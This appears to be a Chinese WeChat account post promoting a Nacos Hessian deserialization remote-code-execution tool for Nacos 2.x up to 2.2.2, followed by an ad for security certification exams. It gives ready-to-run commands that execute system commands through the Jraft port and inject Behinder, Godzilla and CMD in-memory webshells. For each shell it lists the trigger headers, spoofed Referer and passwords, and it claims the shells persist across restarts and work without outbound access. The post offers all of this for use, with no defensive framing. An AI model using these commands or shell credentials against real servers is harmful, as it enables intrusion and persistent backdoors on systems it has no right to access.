现在只对常读和星标的公众号才展示大图推送，建议大家把Hack分享吧“设为星标”，否则可能看不到了！项目简介刨洞安全@凉风 师傅写的一个 Nacos Hessian 反序列化漏洞利用工具，目前已更新到v0.5，欢迎Star！使用方法1. 自动注入内存马并执行命令 java -jar NacosRce.jar Url Jraft端口 'Command'java -jar NacosRce.jar http://192.168.90.1:8848 7848 'whoami'2. 只注入内存马java -jar NacosRce.jar http://192.168.90.1:8848 7848 memshell一、冰蝎内存马：需要设置请求头x-client-data:rebeyond设置Referer:https://www.google.com/路径随意密码rebeyond二、哥斯拉内存马：需要设置请求头x-client-data:godzilla设置Referer:https://www.google.com/路径随意密码是pass和key三、CMD内存马：需要设置请求头x-client-data:cmd设置Referer:https://www.google.com/请求头cmd:要执行的命令v0.5版本实现了不出网漏洞利用可多次发起漏洞利用同时注入冰蝎/哥斯拉/CMD内存马内存马对nacos多版本进行了兼容修复windows的bugtips：请用jdk1.8适用于Nacos 2.x <= 2.2.2非集群的也能打哦此内存马重启nacos依然存活注意事项Windows如用下面的方式执行，注入内存马时会在以下目录生成两个临时文件java -jar NacosRce.jar http://192.168.90.1:8848 7848 'whoami' windowsC:\Windows\Temp\nacos_data_tempC:\Windows\Temp\nacos_data_temp.class如果没有在最后加windows，临时文件会在以下目录，所以权限足够的话，不指定windows也能打成功，没打成功也许是因为没权限操作C盘或其他原因/tmp/nacos_data_temp/tmp/nacos_data_temp.class下载地址点击下方名片进入公众号回复关键字【230706】获取下载链接信 安 考 证需要考以下各类安全证书的可以联系我，价格优惠、组团更便宜，还送【潇湘信安】知识星球1年！CISP、PTE、PTS、DSG、IRE、IRS、NISP、PMP、CCSK、CISSP、ISO27001...